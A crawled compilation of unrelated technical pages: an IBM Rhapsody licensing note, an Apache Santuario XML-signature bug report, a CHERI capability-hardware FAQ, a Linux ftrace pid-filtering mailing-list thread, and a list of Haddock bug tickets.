documentation plugin functionality available, for instance, in [ Javadoc doclets], for alternate output formats.) More documentation about the role and usage of these two Haddock features (API, `.haddock` files), as well as the plans for their development would also be useful. Mailing list thread:" claus 3 None 158 Quasiquotation breaks Haddock/GHCi defect new None 164 Hyperlinked identifiers are not made for identifiers from other exported modules defect new None 166 Missing identifier in Haddock defect new 2010-12-16T21:31:17Z+0000 2012-09-25T12:09:54Z+0100 . " Lemming 3 None 168 Hoogle backend attaches [incoherent] to instance documentation defect new 2010-12-22T22:45:43Z+0000 2013-09-10T10:19:42Z+0100 "Given the input file below, when running {{{haddock --hoogle Haddock.hs}}} I get the output below. There are 3 obvious bugs, all of which I think were introduced when rewriting various bits to move to using the GHC library (there was a bug number 3, which got fixed in Haddock 2.8). 
I'm also tracking this bug at: {{{ {-# LANGUAGE TypeOperators, IncoherentInstances #-} module Haddock where -- | BUG 1: bug1 will not have any documentation class BUG1 a where -- | This documentation is dropped bug1 :: Integer -> a data a :**: b = Bug2 -- ^ BUG 2: The :**: is prefix without brackets -- | BUG 4: The instance below has [incoherent] on it bug4 :: (); bug4 = () instance Num () }}} {{{ -- Hoogle documentation, generated by Haddock -- See Hoogle, @package main module Haddock -- | BUG 1: bug1 will not have any documentation class BUG1 a bug1 :: BUG1 a => Integer -> a data (:**:) a b -- | BUG 2: The :**: is prefix without brackets Bug2 :: :**: a b -- | BUG 4: The instance below has [incoherent] on it bug4 :: () instance [incoherent] Num () }}}" NeilMitchell 3 None 174 Haddock should hide hidden fields of re-exported modules defect new None 187 "With TH, when doing ""cabal haddock"", GHCi ""couldn't find symbol""" defect new None 195 Duplicate documentation on records defect new 2012-03-09T21:45:48Z+0000 2012-09-25T12:09:55Z+01 }}} " DanBurton 3 None 198 haddock-2.10.0 (shipped with ghc-7.4.1) crash defect new 2012-03-28T12:44:27Z+0100 2012-09-25T12:09:55Z+0100 "{{{ haddock: internal error: utils/haddock/src/Haddock/Backends/Xhtml/Layout.hs:204:9-37: Irrefutable pattern failed for pattern Haddock.Types.Documented n mdl }}} in our large project (after deleting docs/index.html and ""make doc"") " maeder 3 None 207 haddock: internal error: spliceURL UnhelpfulSpan defect new None 208 Pattern match failure when processing code using kind variables defect new None 209 "Failure in ""renameType"" when dealing with Template Haskell and tuples" defect new None 210 """failed to parse haddock prologue from file"" error when using non-ASCII characters in .cabal synopsis" defect new 2012-08-13T18:38:58Z+0100 2012-10-14T14:57:39Z+0100 "However, haddock stops failing if an ASCII(or prepended with > or ""о"") description is supplied in cabal package.[[BR]] Minimal example is attached. haddock-2.10.0, ghc-7.4.1" exbb2 3 None 43 Comments on GADT constructors enhancement nwf assigned 2008-06-28T22:32:37Z+0100 2012-10-10T21:06:34Z+0100 "eg. this fails: data I ev w a where Returns :: a -> I ev w a Binds :: I ev w a -> (a -> I ev w b) -> I ev w b Gets :: Ord ev => Maybe ev -> Maybe ev -> I ev w ev -- ^ Accept any character between given bounds. Bound is ignored if @Nothing@. " jeanphilippe.bernardy@… 3 None 70 'Contents' improvements based on Python's docs enhancement new 2009-01-10T22:00:16Z+0000 2012-09-25T12:09:55Z+0100 "Contrasting this page: With this one: We can see a number of ways to improve the library listings for haddock contents. First, there descriptions given to the libraries, rather than just their names. Second, the libraries themselves are grouped into type groups, above and beyond the lib paths themselves. Third, when you actually drill into a page a 'breadcrumb' is placed at the top of the page for navigating back out. Example, clicking on 'array' yields a page headed with: Python v2.6.1 documentation » The Python Standard Library » Data Types » These are 3 links, each stepping back up to a different containing level." crutcher@… 3 None 83 Better parse error messages when parsing the contents of Haddock comments enhancement None new 2009-02-07T10:46:27Z+0000 2012-09-25T12:09:55Z+0100 Needs to be done in GHC. 
waern 3 None 97 Reusable named chunks of documentation for declarations enhancement new 2009-03-09T14:52:44Z+0000 2012-09-25T12:09:54Z+0100 "Currently there is no way of using the same piece of Haddock documentation for two different declarations, apart from copying and pasting it, which can easily lead to them falling out of sync. The current `-- $` syntax only works for documentation which is not attached to declarations. Support for this is useful in cases where you have two or more functions which essentially implement a common interface that hasn't been made into a type class. Examples are `Data.ByteString` versus `Data.ByteString.Lazy` or `Data.Map` versus `Data.IntMap`: looking at the docs of `bytestring-0.9.1.4` I see that `Data.ByteString.Lazy.intersperse` doesn't say that it's `O(n)`, but `Data.ByteString.intersperse` does—an obvious omission. There should be a mechanism for avoiding these kinds of errors, which tend to become worse over time. Extending the `-- $` syntax makes the most sense to me. It could be possible to write something like the following, taking `append` from `bytestring` as an example: {{{ module Data.ByteString (...) where ... -- | @O(n)@ $append ... }}} {{{ module Data.ByteString.Lazy (...) where ... -- | @O(n/c)@ $append ... }}} {{{ -- $append -- Append two ByteStrings. }}} One thing that isn't obvious to me: should the definitions of the chunks have to be in the same module, like now, thus essentially forcing CPP usage? Or would an import be okay? That could lead to ambiguity—should the normal Haskell disambiguation syntax (`Module.foo`) be allowed, then? That could make this ridiculously complex; CPP seems the simplest solution but it's arguably not very clean. Either way would satisfy me." Deewiant 3 None 114 Make the frames version a separate output mode enhancement new None 115 allow putting support files in a relative subdir enhancement new None 144 Allow -- ^ comment on record constructor enhancement new 2010-09-01T17:12:37Z+0100 2012-09-25T12:09:54Z+0100 None 145 Type class instances: link to source enhancement new None 154 Comments on associated types enhancement new 2010-10-03T22:16:01Z+0100 2013-09-21T04:21:20Z+0100 waern 3 None 160 LaTeX output improvements enhancement new 2010-11-19T10:38:41Z+0000 2012-09-25T12:09:55Z+0100 )" mitar 3 None 185 Allow attaching new docs to functions that are re-exported enhancement new 2011-11-05T23:24:29Z+0000 2012-09-25T12:09:55Z+0100 ." duncan 3 None 193 Links to sections enhancement new 2012-02-05T09:55:21Z+0000 2012-09-25T12:09:55Z+0100 )." SimonHengel 3 None 206 Add markup support for properties enhancement new 4 None 84 Document << picure-URL >> syntax defect Fūzetsu assigned 2009-02-07T10:59:10Z+0000 2013-09-05T03:50:33Z+0100 waern 4 None 92 Source links not aligned properly in Google Chrome defect new 2009-02-25T16:04:58Z+0000 2012-09-25T12:09:55Z+0100 waern 4 None 121 "Support export of modules using their ""as"" name" defect new 2009-11-04T06:36:31Z+0000 2012-09-25T12:09:54Z+0100 "Haskell allows you to import modules using an ""as"" name, and re-export the module using that name: module Language.Python.Common ( module Pretty ) import Language.Python.Common.Pretty as Pretty It seems that Haddock 2.4.2 has trouble with this and complains that: Warning: language-python-0.2:Language.Python.Common: Could not find documentation for exported module: Pretty Changing the export to use the full qualified name of the module fixes the problem." bjpop 4 None 149 Long instance declarations are breaking layout. 
defect new 2010-09-07T11:23:18Z+0100 2012-09-25T12:09:54Z+0100 rkit 4 None 165 Parse error on comment before opening brace of record defect new 2010-12-12T19:06:43Z+0000 2012-09-25T12:09:55Z+0100 "This gives ""parse error on input `{'"": {{{ data Test = Test -- | A value { a :: Int -- | Another value , b :: Int } }}} This does not: {{{ data Test = Test { -- | A value a :: Int , -- | Another value b :: Int } }}} The first should parse and give the same result as the second." Mathnerd314 4 None 171 haddock fails to parse {- # ... #-} (note the space) pragma defect Fūzetsu assigned 2011-03-15T21:02:19Z+0000 2013-09-05T02:17:22Z+0100 ." slyfox 4 None 178 Haddock 2.4.2 fails to parse TemplateHaskell modules on x86_64 due to recent binutils defect new 2011-08-17T04:29:05Z+0100 2012-09-25T12:09:54Z+0100 "I know this is a relatively old version, but it's what's packaged with GHC 6.10. I figure it's worth releasing a ...1 on Hackage, if nothing else. Ticket #5050 describes how `-fvia-C` generates invalid assembly on x86_64, which is caught and refused by recent versions of binutils. The workaround is to not use `-fvia-C`. Haddock 2.4.2 is hard-coded to use `-fvia-C` if the `TemplateHaskell` language extension is enabled. This prevents TH-enabled packages from having their documentation generated: {{{ -- th_error.hs {-# LANGUAGE TemplateHaskell #-} module Main (main) where main :: IO () main = return () }}} {{{ $ /opt/ghc-6.10.4/bin/haddock th_error.hs /tmp/ghc18204_0/ghc18204_0.s: Assembler messages: /tmp/ghc18204_0/ghc18204_0.s:160:0: Error: .size expression for Main_main_entry does not evaluate to a constant /tmp/ghc18204_0/ghc18204_0.s:160:0: Error: .size expression for ZCMain_main_entry does not evaluate to a constant }}} This error can be solved by patching Haddock to use the equivalent of `-fasm`: {{{ diff -ur haddock-2.4.2/src/Haddock/Interface.hs haddock-2.4.2.new//src/Haddock/Interface.hs --- haddock-2.4.2/src/Haddock/Interface.hs 2009-03-21 12:22:17.000000000 -0700 +++ haddock-2.4.2.new//src/Haddock/Interface.hs 2011-08-16 20:25:31.551414886 -0700 @@ -97,9 +97,9 @@ modgraph' <- if needsTemplateHaskell modgraph then do dflags <- getSessionDynFlags - setSessionDynFlags dflags { hscTarget = HscC } + setSessionDynFlags dflags { hscTarget = HscAsm } -- we need to set HscC on all the ModSummaries as well - let addHscC m = m { ms_hspp_opts = (ms_hspp_opts m) { hscTarget = HscC } } + let addHscC m = m { ms_hspp_opts = (ms_hspp_opts m) { hscTarget = HscAsm } } return (map addHscC modgraph) else return modgraph #else }}}" JohnMillikin 4 None 183 """failed to parse haddock prologue from file"" error on module" defect new 2011-10-21T00:13:39Z+0100 2012-09-25T12:09:55Z+0100 . " jberryman 4 None 188 Haddock reorders multiple declarations on one line defect new 2011-11-13T13:30:59Z+0000 2012-09-25T12:09:55Z+0100 : " DavidAmos 4 None 189 Incorrect or at least misleading output with PolyKinds + TypeOperators defect new 2011-11-25T18:22:53Z+0000 2012-09-25T12:09:55Z+0100 None 191 Incorrect handling of character references defect new 2012-01-09T03:47:07Z+0000 2012-09-25T12:09:55Z+0100 ü - although &\#252; would achieve the same result in a simpler way. " selinger 4 None 203 very difficult to list pragmas in haddock code blocks defect new 2012-04-28T00:45:42Z+0100 2012-09-25T12:09:55Z+0100 | <% map toUpper ""hello, world!"" %>|] }}}." 
JeremyShaw 4 None 217 Remove import of Haddock.Types from the backends defect new 2012-10-10T03:33:57Z+0100 2012-10-14T14:57:43Z+0100 Replace it with a new exported module (say Documentation.Haddock.Types) so that external backends are not broken when types are added. hamish 4 None 71 Derive portability information from pragmas enhancement new 2009-01-15T21:31:20Z+0000 2012-09-25T12:09:55Z+0100 "It's too easy to write wrong Portability information in the Portability field of a module's haddock header. I wish that Portability information is automatically derived from a LANGUAGE or OPTIONS_GHC pragma, e.g. when no Portability field is specified. Somehow related to ticket #33. " haddock@… 4 None 82 Comments inside record field types enhancement new None 88 Sections in the midst of algebraic datatype definitions enhancement new None 91 Complexity annotations enhancement None new None 179 Reusing named chunks in other modules enhancement new 2011-09-12T00:48:58Z+0100 2012-09-25T12:09:55Z+0100 ." reinerp 4 None 201 Strip one leading blank from each line of a code block, if possible enhancement new 2012-04-12T08:11:32Z+0100 2012-09-25T12:09:55Z+0100 ." SimonHengel 4 None 215 vimhelp backend updated for ghc-7.4.2 enhancement new 2012-09-29T08:27:44Z+0100 2012-10-14T14:57:43Z+0100 " lars_e_krueger 4 None 219 No links from packages back to Haddock index enhancement new 2012-10-10T17:11:49Z+0100 2012-10-14T14:57:43Z+0100 "(NB: this ticket imported from a haskell platform ticket: )). (Not sure if the version of haddock is correct in this ticket)" MtnViewMark 5 None 73 file name does not match module name `Main' defect new 2009-01-23T18:04:33Z+0000 2012-09-25T12:09:54Z+0100 "At least an orthografical error: dependency graph. Furthermore, i don't understand the error: why haddock has to create a dependency graph?" anonymous 5 None 214 html themes are searched even if no html output has been requested defect new 2012-09-29T08:23:28Z+0100 2012-10-14T14:57:43Z+0100 "The offending line is src/Main.hs, line 230 themes <- getThemes libDir flags >>= either bye return If
http://trac.haskell.org/haddock/report/3?format=tab&USER=anonymous
CC-MAIN-2013-48
en
refinedweb
Actually, there are two Timer classes in the JDK. You and he are using two different classes. The code the OP is using is correct for the Timer class he is using. With that said, he already posted this in another thread in this forum, where I answered his question.

No, he is not using his Timer class correctly, and he should read the Javadoc. He imported java.util.Timer; that is the one he is using. He cannot use it in that way. You are thinking of javax.swing.Timer, which he might want to use but is not using. He will get a compile error with his code because of an invalid constructor call. You did not need the unnecessary subclass, but if you did want to use it then you should have used this in the Timer constructor: time = new Timer(5, new TimerListener()); Passing the this keyword means that nothing will be rendered, because the actionPerformed method in your Board class is empty. Hope it helped, Gen.

You should actually avoid passing 'this' out of a constructor, because it is one of the conditions that can cause Java to leak a reference to an object that is not fully initialized, so it is best to get out of that bad habit. A subclass is a good way to avoid it, and a Factory is better but well beyond what he's doing. However, you're right that he used the subclass incorrectly.
http://www.gamedev.net/index.php?app=forums&module=extras&section=postHistory&pid=4904126
CC-MAIN-2013-48
en
refinedweb
Luke Palmer wrote: > This does not answer your question, but you can solve this problem without > rewrite rules by having length return a lazy natural: > > data Nat = Zero | Succ Nat > > And defining lazy comparison operators on it. And if you want to go that route, then see Data.List.Extras.LazyLength from list-extras[1]. Peano integers are quite inefficient, but this library does the same transform efficiently. [1] > Of course you cannot replace usages of Prelude.length. But I am really not > in favor of rules which change semantics, even if they only make things less > strict. My argument is the following. I may come to rely on such > nonstrictness as in: > > bad xs = (length xs > 10, length xs > 20) > > bad [1..] will return (True,True). However, if I do an obviously > semantics-preserving refactor: > > bad xs = (l > 10, l > 20) > where > l = length xs > > My semantics are not preserved: bad [1..] = (_|_, _|_) (if/unless the > compiler is clever, in which case my semantics depend on the compiler's > cleverness which is even worse) Data.List.Extras.LazyLength does have rewrite rules to apply the lazy versions in place of Prelude.length where it can. My justification is two-fold. First is that for finite lists the semantics are identical but the memory behavior is strictly better. Second is that for non-finite lists the termination behavior is strictly better. It's true that refactoring can disable either point, and that can alter semantics in the latter case. Since the module is explicit about having these rules, I would say that users should remain aware of the fact that they're taking advantage of them or they should use the explicit lengthBound or lengthCompare functions instead. -- Live well, ~wren
http://www.haskell.org/pipermail/haskell-cafe/2008-December/052108.html
CC-MAIN-2013-48
en
refinedweb
89 Posts Tagged 'Ruby'

Vim: fun with filters

Vim lets you pipe text through an external filter. There are some obviously nice ways to use this in Linux, like :!sort | uniq which will sort all your lines, and then get rid of duplicate lines. But you can do things that are much more sophisticated if you write your own scripts which read from STDIN and output something back to STDOUT. For example I wrote this Ruby script.

#!/usr/bin/ruby
del = %r{#{Regexp.escape ARGV[0]}} if ARGV[0]
del ||= %r{\s+}
STDIN.each do |line|
  puts '(' + line.strip.gsub(/'/,"''").split(del,-1).collect{|x| "'#{x}'"}.join(',') + '),'
end

This will take a line full of delimited fields, escape all the single-quotes, split into fields on the delimiter, wrap each field in single-quotes, put commas between the fields, wrap each line in (), and put a comma at the end of the line. You can either specify a delimiter, or don't specify one and it'll default to splitting on whitespace. I use this to turn a delimited ASCII file of data into a form suitable for an INSERT command in SQL. So if I start with this:

bob|2|3|Some description
chester|1|4|Another description
sarah|99|0|Let's try an apostrophe

and run this in Vim:

:%!sql_wrap.rb '|'

I get this:

('bob','2','3','Some description'),
('chester','1','4','Another description'),
('sarah','99','0','Let''s try an apostrophe'),

Or consider another simple example. This script will HTML-escape text:

#!/usr/bin/ruby
require 'cgi'
STDIN.each do |line|
  puts CGI::escapeHTML(line)
end

So it'll turn this: Is 5 > 3? Yes, & isn't that neat? into this: Is 5 &gt; 3? Yes, &amp; isn't that neat?

RubyFacets

Today I found a really neat site, RubyFacets. Reminds me a bit of Perl's List::Util and List::MoreUtils; it's a bunch of methods to extend core classes in interesting ways. A while back I posted about a way to prevent Ruby from raising an exception when trying to access an un-initialized subarray of a multidimensional array by extending NilClass. At RubyFacets I found something arguably more interesting: auto-initializing sub-hashes of a multi-dimensional hash. The code:

def self.auto(*args)
  leet = lambda { |hsh, key| hsh[key] = new( &leet ) }
  new(*args, &leet)
end

It took me a couple minutes to figure out what this is doing. The standard new method for class Hash takes a block; if you reference an uninitialized hash element (via the [] method) that block will be called, which presumably assigns the element a default value (though it doesn't have to). The above method assigns a default value to any uninitialized Hash elements referenced via []. The default value is a new Hash object. The new Hash object's constructor is also passed a block which assigns new Hash objects to uninitialized Hash elements. You can see above that the "leet" anonymous function contains a reference to itself. I find that mighty clever. This lets you do crazy things like

h = Hash.auto
h['a']['lot']['of']['dimensions'] = true

and you'll get hashes the whole way down.

Lisp, part 2

Ruby date enumeration

The Date class in Ruby provides an upto method, so you can iterate over a series of dates.

Date.new(2000,1,1).upto( Date.new(2001,1,1) ) do |d|
  puts d
end

This counts by days, so it will print 365 values or so from 2000-01-01 to 2001-01-01. What if you want to count by months? Being able to modify classes in Ruby makes this easy enough. Not sure this handles all situations, but it worked for what I needed.
class Date
  def +(n)
    if n == 0 then
      return self
    elsif self.month + n > 12
      return Date.new( self.year + (n.to_f / 12).ceil, (self.month + n) % 12, self.day )
    else
      return Date.new(self.year, self.month + n, self.day)
    end
  end

  def upto(max)
    date = self
    until date > max do
      yield date
      date = date + 1
    end
  end
end

Date.new(2000,1,1).upto( Date.new(2001,1,1) ) do |d|
  puts d
end

Ruby > Perl

A while back I stopped coding in Perl and started using Ruby for mostly everything. Today I had occasion to use Perl again, because there's no good working equivalent to Perl's Spreadsheet::WriteExcel that works well in Ruby; this Ruby spreadsheet package is a bit too buggy. (It's not my choice to use Excel, but they're paying me to use it. I can't complain. Well, I can complain here I guess. And will.) One thing I notice about Perl is that Perl sure does give your fingers a workout. I looked at the fairly simple 103-line Perl script I wrote, and it has exactly 118 dollar signs. That's a lot of Shift-$ finger reaching, if you think about it. Ruby doesn't even use curly braces around blocks; it uses do and end, which type quite nicely. Ruby does use a lot of pipes, but I can easily do a one-handed Shift-| maneuver if I lift my right hand off the home row. Think of the potential gains I will have when I'm older from the avoidance of arthritis alone. Try to come up with a more petty gripe than this. I dare you.

Theseus and the Minotaur

Here's a little Java game that I found pretty entertaining. When I got to the sixth puzzle I decided to see if I could write a program to solve these kinds of puzzles. I did; here it is in Ruby, featuring OOP goodness and a bit of recursion, but otherwise just brute force. It only takes about .04 seconds to solve maze 9. It doesn't find an optimal solution; it tends to have Theseus wander around like a drunkard. Maybe it could be improved with heuristics, but I couldn't think of one. "Move towards the goal" doesn't work in general, because Theseus has to backtrack a lot on purpose to strand the Minotaur behind walls. It'll save one or two moves at most. "Move away from the Minotaur" or "Move toward the Minotaur" don't work because both are necessary many times. So I don't know. I only tried it on puzzles 6-9, but it seems to work.

FlashGot

I'm likely the last person in the world who heard of FlashGot, but better late than never. FlashGot is a Firefox plugin that lets you integrate with an external download manager program. It also lets you download every link on a page via a single menu command, which is either nice or overkill, depending on what you want to do. Linux doesn't have many (any?) good download managers. There's D4X, but I never cared much for it. I installed GWGET but FlashGot didn't auto-recognize it, and I'm not going through any trouble to get it working. However I still find FlashGot incredibly useful, for one reason: You can use a custom downloader executable. FlashGot will then call the executable and pass it the download URL as a command line argument. You can also pass other arguments (read about them all here) but the URL is all I really need. The downloader I use is a simple Ruby script I wrote myself which calls wget. What's the point of this, you ask? Well, you can do some neat things like:

- Filter your downloads into directories by filetype, filename, source website, or any criteria at all.
- Spawn massive numbers of parallel downloads with a single click. (Probably not a good idea to hammer servers too much with this though, it's not nice.)
- Use all the power of wget, which includes: custom timeout duration, download retrying, download resuming, filename timestamping, download speed throttling, FTP support, and (perhaps my favorite) GOOD filename collision resolution, so if you download a file called 1.png and then download a file called 1.png from a different site, wget will save the second one as 1.png.1. This is something I miss from Safari. Firefox by default tends to ask you if you want to overwrite the old file, which gets very annoying very quickly.
- You could even conceivably crawl a web page or do recursive downloads.

Let's say you want every MP3 you download to go into a "music" folder, every PNG you download to go into a "Pictures" folder, and ignore all other files. You could do something extremely simple like this (which I just wrote in 5 minutes and haven't tested):

#!/usr/bin/ruby
require 'fileutils'
begin
  ARGV.each do |arg|
    dir = ''
    if arg =~ /mp3/i then
      dir = '/home/chester/music'
    elsif arg =~ /png/i then
      dir = '/home/chester/pictures'
    else
      dir = nil
    end
    if dir then
      FileUtils.mkdir(dir) unless File.directory?(dir)
      Dir.chdir(dir) do
        `wget #{arg}`
      end
    end
  end
rescue Exception => e
  # If you want to see the output
  # when the script crashes, you
  # could log it here.
  raise e
end

Point FlashGot to this script and when you "FlashGot All", all linked PNGs and MP3s on a site will be downloaded and sorted, and all other links will be ignored. This would be very useful if you want to grab a whole page of wallpapers, for example. Shoot.
http://briancarper.net/tag/95/ruby?p=9
CC-MAIN-2013-48
en
refinedweb
I will fix the keysig thing tonight. I will take out the mode option. A user requested it several years ago but I dont think its necessary and it complicated the code. Eventually I would like to see all dialogs written in scheme rather than c. We could script it now without the use of any gtk widgets by having menu items for each key in subdirectories like key->set initial->d major. Then possibly a popup can ask if you want all staffs. Then these keychanges can be recordable actions. What do you think? Jeremiah Sent from my Samsung smartphone on AT&T Richard Shann <address@hidden> wrote: >I have checked the screenshot stuff, working for gtk2 but disabled for >gtk3. >It turns out that the gtk3 code cannot be easily back ported to gtk2, so >I have both versions in screenshot.c >The gtk3 version is surrounded by #if 0 ... #endif as I have not been >able to compile it, and it is almost sure not to work even if it >compiles as it is just an initial hack of the gnome-screenshot code from >gtk3. >Can you check that this branch still compiles for gtk3 please? There are >only two issues with running the gtk3 branch version on gtk2 that I have >found so far > * Initial Keysignature dialog broken > * Horizontal scroll bar jammed wide open >I haven't looked at the DenemoGraphic stuff yet. > >Richard > > >On Thu, 2011-11-24 at 11:16 -0600, Jeremiah Benham wrote: >> Sure,
http://lists.gnu.org/archive/html/denemo-devel/2011-11/msg00061.html
CC-MAIN-2013-48
en
refinedweb
Would I be able to set it to "Desktop/GreatWall.JPG". Would that work if the image is there? Type: Posts; User: Leonardo1143 Would I be able to set it to "Desktop/GreatWall.JPG". Would that work if the image is there? import java.awt.BorderLayout; import java.awt.event.ActionEvent; import java.awt.event.ActionListener; import javax.swing.ButtonGroup; import javax.swing.ImageIcon; import javax.swing.JFrame;... How would I do the latter? just put in (double r)? Here is what my compiler is telling me: GeometryCalculator.java:20: error: constructor Sphere in class Sphere cannot be applied to given types; Sphere sp = new Sphere(r); ^... Nvm fixed that one too --- Update --- Alright my code compiled without a problem. Thank you guys --- Update --- I'm having some trouble. Right now it's just that the compilier is telling me it cannot find the symbol Grades.java:10: error: cannot find symbol ArrayList<Integer> Grades = new... Sorry I was doing this on a website. It messed up when I moved it here. But I fixed the problem. public boolean sum28(int[] nums) { int [] sum28 = {10,2,2,2,2,50}; int sum; for (int i=0; i<sum28.length; i++) //This will cycle through the elements { if (sum28[i] == 2) //If... Oh sorry for ambigious in my first post. But What I was wondering is how to loop it, effectively, and what are the coordinates. For example (x,x,x,x). What do each of those x's represent when i want... import javax.swing.*; import java.awt.Graphics; import java.awt.Color; public class MyDrawing_Start extends JFrame { public MyDrawing_Start() { add (new MyPanel()); } public static... Okay, now i am bit confused. So I may just go the longer route and just individually label the parts I need for my algorithm to work (armor,combat level,etc). Thanks for trying though. Oh okay so using 10 for my example should fix it? I chose 27 because it was used in the example That was the whole error message and No I don't know what the radix was I was basing it off the API's example. I thought the second arg,27, was for radix? The API used that as an example. "Exception in thread "main" java.lang.Error: Unresolved compilation problem: at... Armor = parseInt("Armor", 27) like that? So how would I go about assigning the string value of armor to an int? Like I said parseInt("Kona", 27) returns 411787 returns a value but when I try parseInt("Armor", 27) Okay I read it and don't completely understand it. If I have a string value, like armor, Do i put it in like this? Integer.parseInt(Armor); ... Where would I find the API document? Sorry it seems I was supposed to use "Integer.parseInt()". But how would I go about changing something like armor, a string, to 25, an int value, using this? Exception in thread "main" java.lang.Error: Unresolved compilation problem: The method parseInt(JTextField) is undefined for the type new ActionListener(){} at... import javax.swing.*; import java.awt.event.*; import java.util.Random; public class SimpleWindow extends JFrame { JLabel... Thank You, Norm. I got it to work thank you for being so patient with me. Oh. I think I'm getting it. Remove setText(). from the method and move into the action listener only? Okay which line of code is calling the setText()? I can't see it? Because I thought I needed to place getText in order for the setText to be called. I'm guessing this is wrong?
http://www.javaprogrammingforums.com/search.php?s=fc37a907315bd29feb8952ce58d69be3&searchid=685649
CC-MAIN-2013-48
en
refinedweb
Report Design Tips and Tricks SQL. Contents Introduction Best Practices and Tips Report Samples For More Information Introduction? Note This document assumes that the reader is familiar with the Reporting Services product, report design concepts, and possesses a basic knowledge on how a report is processed and managed by the report server.: - Optimize report queries.. - Retrieve the minimum amount of data needed in your report.. Rendering Formats. Pagination. Choose Appropriate Rendering Formats Control Page Size Controlling page size in the report not only changes the report layout, it also impacts how the report is handled by the Report Processing and Rendering engine. There are three types of page breaks: logical page breaks, soft page breaks, and physical page breaks. Logical). Soft Page Breaks. Physical Page Breaks. Check Reporting Services Log Files When you experience problems with report execution or need to interpret the performance characteristics of your reports, check the log files described in this section. Reporting Services uses these log files to record information about server operations and status. Windows Application. - Error information. Report Server Execution Log. Use Device Info to Control the Behavior of a Rendering Extension. HTML). PDF/Image. Office Excel. XML. Use a Multivalue Parameter Inside a. - Change the RDL namespace: - Remove the following elements entirely if present in the RDL file: - To remove all occurrences of interactive sort in the RDL file, remove all <UserSort> elements, including the inner contents. Report Samples.. Dynamic Field Based on Parameter, Dynamic Grouping::) Dynamic Columns -: Dynamic Page Breaks -:) Resetting the Page Number on a:. Horizontal Tables))
http://technet.microsoft.com/en-US/library/bb395166(v=sql.90).aspx
CC-MAIN-2013-48
en
refinedweb
- how powerful the manged c++ from .net is? - Function Self-Call error - gernerating sound from motherboard - Generic function - Questions - binary file i/o -- why doesn't this work? - File Loading - namespace tm? - A question about class members and constructors - OpenMP question - vector and pairs - Casting int to enum problem - Returning info from "system()" - reference to *this in initialization list? - problem in binary search - Passing .Net Bitmap to C++ Dll - couting output to a secondary console window - Template metaprogramming, whats the point? - Can I use string or chars in a switch? - Registry, Regedit - more precise version of clock() function - What's a permuted index? - Overloading a priority queue - GDB and inheritance - Problem
http://cboard.cprogramming.com/sitemap/f-3-p-237.html?s=347db66d120a8b30fd506712af01a4d2
CC-MAIN-2013-48
en
refinedweb
Diego Biurrun wrote: > On Sun, Aug 02, 2009 at 10:54:57AM +0300, Christian P. Schmidt wrote: >> Attached a second attempt at adding the support for LPCM streams in mpeg transport streams. > >> +#if CONFIG_DECODERS >> +#define PCM_MPEG_DECODER(id,name,long_name_) \ >> +AVCodec name ## _decoder = { \ >> + #name, \ >> + CODEC_TYPE_AUDIO, \ >> + id, \ >> + sizeof(PCMDecode), \ >> + pcm_mpeg_decode_init, \ >> + NULL, \ >> + NULL, \ >> + pcm_mpeg_decode_frame, \ >> + .sample_fmts = (enum SampleFormat[]){SAMPLE_FMT_S32, SAMPLE_FMT_NONE}, \ >> + .long_name = NULL_IF_CONFIG_SMALL(long_name_), \ >> +}; >> +#else >> +#define PCM_MPEG_DECODER(id,name,long_name_) >> +#endif >> + >> +#define PCM_CODEC(id, sample_fmt_, name, long_name_) \ >> + PCM_ENCODER(id,sample_fmt_,name,long_name_) PCM_DECODER(id,sample_fmt_,name,long_name_) >> + >> +/* Note: Do not forget to add new entries to the Makefile as well. */ >> +PCM_MPEG_DECODER(CODEC_ID_PCM_BLURAY, pcm_bluray, "PCM signed 16|20|24-bit big-endian"); > > I don't think it makes sense to use a macro for one declaration. Agreed. The macro is there to easily move pcm_dvd here in the next phase. The PCM_CODEC macro is a copy&paste leftover and will be removed - I can't encode without complete knowledge of the meaning of the remaining bits. Will fix the other issues (codingstyle, whitespaces). Regards, Christian
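Expanded by hand, the quoted PCM_MPEG_DECODER invocation for CODEC_ID_PCM_BLURAY amounts to a single declaration along these lines (a sketch built only from the macro body quoted above; the AVCodec struct layout and the referenced ffmpeg symbols are assumed from that context rather than checked against a header):

/* Hand expansion of
 *   PCM_MPEG_DECODER(CODEC_ID_PCM_BLURAY, pcm_bluray,
 *                    "PCM signed 16|20|24-bit big-endian")
 * using exactly the fields that appear in the macro body above. */
AVCodec pcm_bluray_decoder = {
    "pcm_bluray",
    CODEC_TYPE_AUDIO,
    CODEC_ID_PCM_BLURAY,
    sizeof(PCMDecode),
    pcm_mpeg_decode_init,
    NULL,                /* no encode callback: decoder only */
    NULL,                /* no close callback */
    pcm_mpeg_decode_frame,
    .sample_fmts = (enum SampleFormat[]){SAMPLE_FMT_S32, SAMPLE_FMT_NONE},
    .long_name   = NULL_IF_CONFIG_SMALL("PCM signed 16|20|24-bit big-endian"),
};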
http://ffmpeg.org/pipermail/ffmpeg-devel/2009-August/060543.html
CC-MAIN-2013-48
en
refinedweb
This patch set is the final step towards making LockD network namespace aware. I can't prove that this patch set is enough for NFSd (I just haven't tried), but Lockd works fine and patches for it will be sent soon.

The following series consists of:
---
Stanislav Kinsbursky (4):
      SUNRPC: clear svc pools lists helper introduced
      SUNRPC: clear svc transports lists helper introduced
      SUNRPC: service destruction in network namespace context
      SUNRPC: service shutdown function in network namespace context introduced

 include/linux/sunrpc/svcsock.h |    2 +-
 net/sunrpc/svc.c               |   36 +++++++++++++++++++++-----------
 net/sunrpc/svc_xprt.c          |   45 ++++++++++++++++++++++++++++------------
 3 files changed, 56 insertions(+), 27 deletions(-)
http://lkml.org/lkml/2012/1/25/134
CC-MAIN-2013-48
en
refinedweb
What is the appfuse Advertisements Matt Raible are Appfuse developed a guiding entry-level J2EE framework, how to integrate its popular Spring, Hibernate, ibatis, struts, Xdcolet, junit, etc. give the basic framework of the model, the latest version 1.7 is provided on Taperstry and JSF support. In the persistence layer, AppFuse uses Hibernate O / R mapping tools (); in containers, it uses Spring Framework (). Users can freely select Struts, Spring / MVC, Webwork, Taperstry, JSF several web framework. The use of TDD development mode, the use of JUnit tests on each floor, and even test jsp output w / o error. In order to simplify the development of a set of predefined good directory structure, base class, used to create databases, configure the Tomcat, the deployment of applications to test Ant tasks to help Express automatically generated source code and automatic maintenance of some configuration files. References: At https: / / appfuse.dev.java.net / can download Appfuse, the current version is 1.7. Appfuse reference materials and documentation can view. Second, Appfuse Framework Quick Start AppFuse project's main objective is to help developers reduce the time a project at the beginning of the work to be done. The following is a use it to create a new project of the basic steps: 1, download or from CVS (cvs-d: pserver: [email protected]: / cvs co appfuse) detected in the latest version of appfuse source. 2, install 